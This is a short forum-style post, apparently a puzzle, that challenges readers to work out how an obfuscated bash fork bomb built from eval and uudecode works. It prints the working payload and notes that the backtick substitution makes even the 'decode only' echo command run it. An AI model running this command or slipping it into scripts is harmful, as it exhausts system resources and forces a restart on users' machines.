Challenge: defuse this fork bomb
On lobste.rs I found link to an article from Vidar Holen, the author of shellcheck. He made a fork bomb that is really interesting. Here's the bomb:
eval $(echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode)
This may look pretty obvious, but it's harder than you think. I fell for it. twice. Can you find out how this bomb works?
Warning: executing the bomb will slow down your computer and will force you to restart.
You can limit impact of the fork bomb by setting FUNCNEST
export FUNCNEST=3
Have fun!
This is the command that actually runs when you run that, that article explains this. Everything else doesn't do anything.
I too feel for it once, I ran
echo "I<RA('1E<W3t`rYWdl&r()(Y29j&r{,3Rl7Ig}&r{,T31wo});r`26<F]F;==" | uudecode